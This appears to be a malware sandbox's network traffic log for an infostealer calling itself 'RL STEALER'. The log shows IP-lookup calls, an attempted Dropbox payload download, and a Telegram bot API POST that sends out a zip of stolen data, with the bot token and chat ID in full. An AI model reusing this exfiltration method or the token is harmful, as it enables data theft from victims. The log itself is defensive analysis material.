Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:15 UTC	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
2024-07-06 11:28:15 UTC	211	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:15 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89ef401198940cc9-EWR
2024-07-06 11:28:15 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49841	149.154.167.220	443	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:16 UTC	1520	OUT	POST /bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument?chat_id=-4206528371&caption=====%20RL%20STEALER%20====%20%0A%E2%8F%B0%20Date%20=%3E%2007/06/2024%207:27%0A%F0%9F%92%BBSystem%20=%3E%20Windows%2010%20Pro%20(64%20Bit)%0A%F0%9F%91%A4%20User%20=%3E%20user%0A%F0%9F%86%94%20PC%20=%3E%20134349%0A%F0%9F%8F%B4%20Country%20=%3E%20[United%20States]%0A%F0%9F%94%8D%20IP%20=%3E%208.46.123.33%0A%F0%9F%93%9D%20Language%20=%3E%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0A%F0%9F%94%93%20Antivirus%20=%3E%20Windows%20Defender.%0A%20====%7B%20User%20Data%20%7D====%0A%F0%9F%93%82%20FileGrabber%20=%3E%2081%0A%F0%9F%93%A6%20Telegram%20=%3E%20%E2%9D%8C%0A%F0%9F%92%B8%20Wallets%20=%3E%20%E2%9D%8C%0A%F0%9F%92%AC%20Discord%20=%3E%20%E2%9D%8C%0A%F0%9F%93%A1%20FileZilla:%20%E2%9D%8C%0A%20VimeWorld%20=%3E%20%E2%9D%8C%0A%20====%7B%20VPN%20%7D====%0A%20%E2%88%9F%20NordVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20OpenVPN%20=%3E%20%E2%9D%8C%0A%20%E2%88%9F%20ProtonVPN%20=%3E%20%E2%9D%8C%0A%20====%7B%20Browsers%20Data%20%7D====%0A%F0%9F%9 [TRUNCATED] Content-Type: multipart/form-data; boundary=------------------------8dc9ea4f458eb80 Host: api.telegram.org Content-Length: 674280 Expect: 100-continue Connection: Keep-Alive
2024-07-06 11:28:17 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-06 11:28:17 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 39 65 61 34 66 34 35 38 65 62 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 31 33 34 33 34 39 5c 40 5b 55 6e 69 74 65 64 20 53 74 61 74 65 73 5d 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 4b 03 04 2d 00 01 00 08 00 84 3b e6 58 bb 28 fe 09 ff ff ff ff ff ff ff ff 0f 00 38 00 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 74 78 74 01 00 10 00 9a 02 00 00 00 00 00 00 4e 01 Data Ascii: --------------------------8dc9ea4f458eb80Content-Disposition: form-data; name="document"; filename="C:\ProgramData\134349\@[United States].zip"Content-Type: application/x-ms-dos-executablePK-;X(8Information.txtN
2024-07-06 11:28:17 UTC	16355	OUT	Data Raw: 0b eb bf 19 42 d0 6d d1 f6 22 c5 a6 34 56 f2 dc 7c 5b 83 60 28 db 41 a1 4c 7b 91 31 f0 56 be e5 6d 1b 06 22 72 48 b9 0e 75 f6 09 9d d3 b7 52 dd 07 28 81 c6 7e 3d a6 19 ad 93 67 d7 17 96 90 18 51 ef 4d c7 5a 87 98 c6 01 dd 8c ec 7e 7b 27 fa be 5e 26 59 91 43 20 a6 b6 6d d4 65 91 55 37 92 f5 5f 1c b6 a3 4e d7 33 bd 0e fe 37 20 c3 a8 d9 bb 64 48 12 d1 81 72 a0 13 3e f6 4d 49 bc 63 db d6 d5 8a 6b e7 bc 5b 47 64 c6 21 1d c5 aa 76 2a f7 cb 38 63 0e 40 9a f6 f4 4a 59 99 d5 3d 3f 39 44 8f e7 33 c8 a3 99 9f 8d 70 39 65 03 7d ec 28 89 f1 9f ba c1 c6 f8 7e 5f d7 79 5e 15 99 6c 4e 50 de 01 4e 49 50 49 bb 63 b5 79 7f 49 84 7d 18 0d ab 48 8b 7b 06 85 bc e6 3e 88 5a 7b 79 6c e3 0a 18 05 33 80 22 53 ea 16 3c d3 b6 e9 c5 3f 70 5f c2 d5 07 de 69 37 6b 62 6a 5e 54 31 90 94 Data Ascii: Bm"4V\|[`(AL{1Vm"rHuR(~=gQMZ~{'^&YC meU7_N37 dHr>MIck[Gd!v*8c@JY=?9D3p9e}(~_y^lNPNIPIcyI}H{>Z{yl3"S<?p_i7kbj^T1
2024-07-06 11:28:17 UTC	16355	OUT	Data Raw: ce 33 58 97 0e 1f 99 cd d8 3a 02 64 13 53 09 2d ce 42 84 d2 4e f3 d8 ea a8 4a 66 ed cb a9 c3 1a 80 a2 7c f4 70 1b d5 2d 03 15 07 97 d0 d3 c5 8e a9 0a ef 6e d7 8e ca 92 b2 11 dd 12 8f 47 33 09 f8 6b 5e ee 55 a7 e1 7b 16 a1 d5 b8 c4 65 e0 ac f1 3d 23 57 7b 98 48 ec 8b d5 c7 47 df 22 bd 2b a3 33 bd aa 53 9c df 50 8a 7d 86 74 06 a8 a8 03 53 ee 6b 56 ca 5e 79 c7 69 4b 99 da ab 9c 8c c0 0b bf 29 56 ec bb e5 d5 a1 09 23 58 3d 44 7b 88 cc 9d 0c 76 c6 56 cd 88 4d 6b fc 75 32 83 a4 c4 f7 2d 96 25 5a 18 94 cf d6 b9 e3 04 46 27 8c 42 f8 d2 d5 95 e0 72 6f 84 f1 de 42 19 00 3c cb 87 52 e3 65 01 1c 8d ff cf df a5 b4 10 ff 17 0a b0 0e bf 97 2a 89 cb e8 dd 63 d2 57 54 a5 49 0b 33 96 a5 8e f4 e0 3f 19 4d 31 93 e7 29 cf d4 5b dd 5a 4e 1e 19 9c 18 e2 74 aa 82 e2 33 85 23 ea Data Ascii: 3X:dS-BNJf\|p-nG3k^U{e=#W{HG"+3SP}tSkV^yiK)V#X=D{vVMku2-%ZF'BroB<Re*cWTI3?M1)[ZNt3#
2024-07-06 11:28:17 UTC	16355	OUT	Data Raw: 08 98 cc 06 be d1 4c 7b b2 b6 39 9d b8 ea 60 2c ac 28 42 b1 e8 ef c3 b1 22 87 67 f1 98 eb c1 6e 08 59 a6 15 d9 83 69 75 70 a5 fb 62 c2 24 22 d2 9e f3 40 55 6f 3f 5c 10 9d dc 1d 01 91 78 cc 46 42 c2 0d 39 37 f8 de 83 80 b2 bf 23 6b 02 ed 1e 2d a5 90 0b c7 ac c8 9c 42 80 7b 47 b5 d2 02 31 5f 8f 6e 9e 8c a9 a6 bd e0 28 a4 1b ae 2f be f1 d6 e8 9f a2 7f 4a 5c 65 23 7e 94 d7 5a 55 b4 c4 a7 74 0e f7 50 76 df a8 f5 34 6c 91 ce b2 86 8b 0a e8 bf 07 a1 2e 82 66 93 04 a9 f4 24 ad aa ea c2 05 f1 09 96 0b d8 07 da 52 a1 6f 3a 34 af a2 9f bd 3b f5 1a 62 d7 ed 16 19 46 ad 93 fb dc 71 70 de 6b 9b 26 85 d8 98 9d 67 ce 96 f6 98 79 0b 3c 01 54 f7 aa ff da be 82 91 64 ff 88 db 9f fe 9e cc a7 e4 f5 b5 73 1d 24 3d 4c 2d 02 8f 6a 0c 6e cc d5 83 8a d0 ba 28 34 05 8f bb 17 c0 ac Data Ascii: L{9`,(B"gnYiupb$"@Uo?\xFB97#k-B{G1_n(/J\e#~ZUtPv4l.f$Ro:4;bFqpk&gy<Tds$=L-jn(4
2024-07-06 11:28:17 UTC	16355	OUT	Data Raw: 28 65 13 fa 86 e1 84 83 73 7a 12 c8 4a 8a 25 d3 ea 89 49 e9 92 7d 55 1c cd 8d 86 18 3e d1 84 4b 18 a6 d7 4f 4e 2c 38 12 4e a3 b6 28 a6 22 d3 28 e3 9b 81 05 3d fd e0 40 46 fa bc 15 6f 50 39 9a c8 8b 1d 41 1f f2 e3 f3 33 e5 66 d6 aa ac 6f 45 c0 f5 e2 65 a3 4e d5 58 5b 90 3e e4 a7 e4 39 ee be a7 df 61 44 42 57 1f 1e fa d3 12 0d ab e6 d6 f6 59 58 e6 d6 5b 3e a0 ec 94 e4 e5 e8 fc e2 5b 50 87 5b a1 2c 26 41 62 7b 74 4f 85 f2 11 74 33 5e 0e 58 37 1a 43 62 4b 46 5c 25 53 36 00 ac ec 35 9e 18 e6 2b 27 9c 5b 17 f2 be 7b 4e 90 40 57 c8 51 b4 90 41 c3 f7 8c 02 4d 34 d6 5c bf 63 2c 37 5f 65 01 56 41 5d cf a6 49 f3 e8 b0 38 88 12 01 30 1d 03 5e 3b ec 8e 3e e1 9c e6 cc 04 9a dd 62 77 dd eb 7b 84 5e c4 6f b4 f7 28 9c 87 82 c6 c6 7a 0c 10 ca 08 68 35 74 be ad 31 0a 26 aa Data Ascii: (eszJ%I}U>KON,8N("(=@FoP9A3foEeNX[>9aDBWYX[>[P[,&Ab{tOt3^X7CbKF\%S65+'[{N@WQAM4\c,7_eVA]I80^;>bw{^o(zh5t1&
2024-07-06 11:28:17 UTC	16355	OUT	Data Raw: 68 ee d9 6e ea 82 8b ac 7d 1a fd c0 c6 4e 5e fc 93 72 47 c1 1a b7 3f c5 46 81 9b 03 8c 35 90 bf 77 33 52 99 10 82 49 4c c1 1b 4b 21 4c 21 1e 3c 5b 9b 3d 45 52 51 13 73 84 85 59 fd be f8 bd 37 eb d3 b3 77 b0 17 12 04 f4 b6 32 68 c0 ee c7 09 88 98 62 84 9e 34 9c 43 6e 5f fe be b8 4c c7 33 50 ac f1 d2 16 c8 5c 09 e1 91 28 6b de 39 17 49 62 fd 0c a9 6d 21 a7 df 49 a0 80 83 6d 55 40 37 4d 98 f9 12 56 9f f8 b0 86 aa 42 fe fa 8d 83 25 65 e9 1a b5 f1 e7 53 73 58 8e f9 20 1d 51 ea 19 e9 ae 7f 77 0e f0 01 1d ff 66 82 5e c8 5a d2 10 ca 8d 3c f0 68 7e 78 ed 20 37 8c 7e 65 57 4a 17 62 f5 10 0d e2 cc 26 5c c7 5b 6e 7c 0c 97 46 8c c6 37 cf 23 cd e5 e1 d5 32 3d 45 c4 c2 02 d2 5a 55 f5 0f 38 ac 1e 62 19 1d 6e 1d 99 5c 5f 20 92 48 8f da 4f bf 08 d5 08 64 17 26 ee 7f 49 8b Data Ascii: hn}N^rG?F5w3RILK!L!<[=ERQsY7w2hb4Cn_L3P\(k9Ibm!ImU@7MVB%eSsX Qwf^Z<h~x 7~eWJb&\[n\|F7#2=EZU8bn\_ HOd&I
2024-07-06 11:28:17 UTC	16355	OUT	Data Raw: ff 4f a0 7c 92 00 77 87 b8 f5 91 17 00 e6 12 32 be 9d f2 eb a2 07 3a 88 17 f6 28 7a 6c 49 47 59 77 f1 15 a5 f6 8d da 76 1d 5c a2 94 68 32 68 25 61 ae 2f 59 8d f1 33 63 2d 1c 43 44 9c 1e 13 f0 7d 9a 47 0c 2d e5 67 7b 93 e8 37 e5 32 e0 11 2a 9b c6 05 5b 7a 21 88 d8 df 1d da eb 45 f7 f1 8f ac 09 9d 39 ba 61 f8 27 cf 22 41 88 d8 fd c9 e5 23 79 e7 e8 34 ec 86 f9 9d 96 94 79 65 c4 ec 95 cc 2d 1b 23 51 86 ef b6 3f e8 61 11 a1 99 11 59 f8 10 f3 54 0a 73 fa 05 21 b9 1c 16 8a 5f 29 86 26 9c 34 72 65 6c 4f e9 fb c7 82 86 ae 46 31 55 09 08 9f 92 d4 56 9c 30 f1 50 49 49 a2 d5 27 30 d1 96 48 c7 88 8b 7c 62 77 7f ae db a6 c9 ef 47 2e a0 0e ed 18 c7 a4 86 0b 81 b2 88 7b 9a 40 22 1e 63 35 32 51 3d bf fa e7 af a9 e6 9d 4a 94 91 30 78 a9 70 de cb fd 82 4b 0b ef ac a1 62 c3 Data Ascii: O\|w2:(zlIGYwv\h2h%a/Y3c-CD}G-g{72*[z!E9a'"A#y4ye-#Q?aYTs!_)&4relOF1UV0PII'0H\|bwG.{@"c52Q=J0xpKb
2024-07-06 11:28:17 UTC	16355	OUT	Data Raw: ff 95 a4 c7 0c de 0a f3 30 9c 57 87 11 6c 8d 69 12 42 a8 31 26 2e b8 a1 89 8f 72 28 e0 9e 60 59 a5 4c 67 3b 09 a1 fa 05 56 40 be bf ac 10 4b 35 bf c9 b5 f2 80 04 64 c1 9e e0 3e 80 04 4a ec 86 04 71 6d 10 55 05 56 e9 92 a6 4b a1 5c 77 26 71 b9 bb 77 86 f4 76 39 23 9a bd 13 c0 51 29 6b 32 d7 45 47 df 9e 72 3a 27 7d cd 7d 02 33 93 b4 21 24 e0 d0 67 c5 4a 06 c6 65 f2 1a 1c 06 57 77 fb d3 11 b1 54 7d b6 d5 e5 40 b3 cb 59 e9 7e 5e d2 02 e3 c3 25 a8 81 2e 5a ed 96 a4 bf 80 6e 41 33 b6 7f 6f 0d af 8c d3 7b c3 fc 99 f4 04 97 b8 f4 08 d2 d1 5e 90 34 b7 b6 21 41 f7 af b0 ca c5 30 ea 46 e8 f6 ba a8 c3 56 47 03 5d 0d 11 6f 5e 51 2e 55 68 be cb b9 cc 2e e4 d7 6b da ea ad 2d f8 f1 ed a4 c1 3b 7d 80 b1 91 bf 70 f3 b6 15 77 89 c5 29 db 8d 7a 8c ae ef 1d 5e 1a 1e 83 36 d3 Data Ascii: 0WliB1&.r(`YLg;V@K5d>JqmUVK\w&qwv9#Q)k2EGr:'}}3!$gJeWwT}@Y~^%.ZnA3o{^4!A0FVG]o^Q.Uh.k-;}pw)z^6
2024-07-06 11:28:17 UTC	16355	OUT	Data Raw: f4 23 0f ee 57 f6 9b 98 a0 fa 3a c8 05 bd 3c 03 74 90 62 de cc 1e 08 84 d8 ab 14 3f 82 34 de f9 e6 a1 d1 59 c9 dc f1 4b 66 ec e6 dd 7e 54 f8 ba 4e bd 1d b4 93 95 67 76 a7 d4 21 f7 51 ea b2 56 c2 f1 f3 55 1a fd a3 f4 61 7a 9d e2 9b 31 8f 8b e2 7b f0 38 8d d8 72 f9 1b b7 b0 e7 b5 da 6d 03 3d 10 ec e7 17 14 ce 80 c5 2a 65 40 d8 b3 a0 34 24 74 1d 30 9b ad eb b2 c8 dc 11 d9 1d fc 32 cd 01 dc a1 d0 b6 e5 2f ef a0 cf 91 6b ec 78 ee 39 ec 4c 56 f8 fd 6d 2d ee 05 97 5e ae 52 cb 78 7f 4f d7 ae 48 fb 20 3b 70 45 55 42 15 cb 15 8c 81 a6 78 cb ad b2 df f4 a7 b5 bd b3 c9 81 7f 0b 32 92 fb 59 87 de c3 ce 68 e5 81 c2 94 cd 09 76 de e6 2f 31 5a 41 a8 b9 48 ee 4e ea b9 fc ff 0b 50 b0 8d 1b a9 17 7f ce 6f b8 cd ba 91 60 1e 65 f2 d4 88 32 a7 15 e7 dd 22 91 c0 e6 19 99 76 58 Data Ascii: #W:<tb?4YKf~TNgv!QVUaz1{8rm=*e@4$t02/kx9LVm-^RxOH ;pEUBx2Yhv/1ZAHNPo`e2"vX
2024-07-06 11:28:17 UTC	16355	OUT	Data Raw: 5f c6 ca 0f 15 b4 ce 96 25 5e 5f 0c f9 6a e3 fa 05 cf ec 90 0b af e9 5c ba 08 dd 4c cf 07 05 49 d5 5b 8c 43 1c 9e 56 49 e9 7f 89 ca a4 81 12 89 e2 7a eb b8 05 7f c1 ce 8a 39 0f 97 3c f3 84 ad f2 1f aa cc 52 5e 2f 7f 10 a7 b6 5c a6 e6 28 88 3d 1d 34 a2 4d df 63 06 72 f1 f0 cc ac de 0d 53 89 2c 4a e3 9c d6 1a 20 a0 d5 43 95 5e 62 73 7d 2c 79 a3 0f fa 58 ae 53 f2 f7 1a db 8b 21 31 b8 71 a6 93 62 7b ff 94 9b f3 d8 1f 16 c0 04 e8 fb 77 d7 ae bf ee 8f e6 1d a9 27 70 59 21 9f 52 85 06 72 6f 48 1e a7 80 77 05 17 d7 fa 09 7e 0b d6 4b 2c 6b 15 30 26 0e ca 73 4c 94 f8 c8 b8 89 21 77 fe 2f 85 56 80 52 81 c1 a6 b5 19 56 99 d6 a3 8a 97 55 ae fc 48 0d d5 79 7a a0 4d 74 32 c8 5e f2 92 31 8f 48 71 2d a5 96 76 26 aa 9d f7 70 d8 60 bc 4b e9 7d 92 08 ec 83 1a 6a 9d 38 ce 07 Data Ascii: _%^_j\LI[CVIz9<R^/\(=4McrS,J C^bs},yXS!1qb{w'pY!RroHw~K,k0&sL!w/VRVUHyzMt2^1Hq-v&p`K}j8
2024-07-06 11:28:17 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Sat, 06 Jul 2024 11:28:17 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49858	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:28 UTC	107	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com Connection: Keep-Alive
2024-07-06 11:28:28 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:28 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 4940563c263a4ed3b37c3a86e8dbeffc Connection: close
2024-07-06 11:28:28 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49857	188.114.96.3	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:28 UTC	67	OUT	GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
2024-07-06 11:28:28 UTC	645	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 06 Jul 2024 11:28:28 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Sat, 06 Jul 2024 12:28:28 GMT Location: https://ipbase.com/xml/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C%2BIxHCCRsryuVWR2DI8aqY%2FDz3uID2mS8hANzEXB5xfj0blGRiEJ%2BHF02hoZxxZPcdMe1LbdJcJd5rSbLkr%2BEOYAxcgPBJLHsBCvVET4%2Bv%2BDolMIqbE2ojqF3yoaUEiD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef406199238ca2-EWR alt-svc: h3=":443"; ma=86400
2024-07-06 11:28:28 UTC	167	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49859	162.125.66.15	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:28 UTC	107	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com Connection: Keep-Alive
2024-07-06 11:28:28 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Sat, 06 Jul 2024 11:28:28 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: e52878a685204f45bccfbb878255493b Connection: close
2024-07-06 11:28:28 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49861	172.67.209.71	443	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-06 11:28:28 UTC	64	OUT	GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
2024-07-06 11:28:29 UTC	731	IN	HTTP/1.1 404 Not Found Date: Sat, 06 Jul 2024 11:28:29 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Age: 50755 Cache-Control: public,max-age=0,must-revalidate Cache-Status: "Netlify Edge"; hit Vary: Accept-Encoding X-Nf-Request-Id: 01J23WTYW1WES339EJ18E99HNP CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDDK09sas0hEkzBID3%2BV004n7lwwGklSht2LAABLcpqI30Ljl5Xa4KTbAnhKSReO9QOw7cF96foreNRVbTWde7QfcCUmLDeDvDnByblnH8hswsz2snMBnM4Gnyko"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef406588498cc0-EWR alt-svc: h3=":443"; ma=86400
2024-07-06 11:28:29 UTC	638	IN	Data Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
2024-07-06 11:28:29 UTC	1369	IN	Data Raw: 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 Data Ascii: } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh
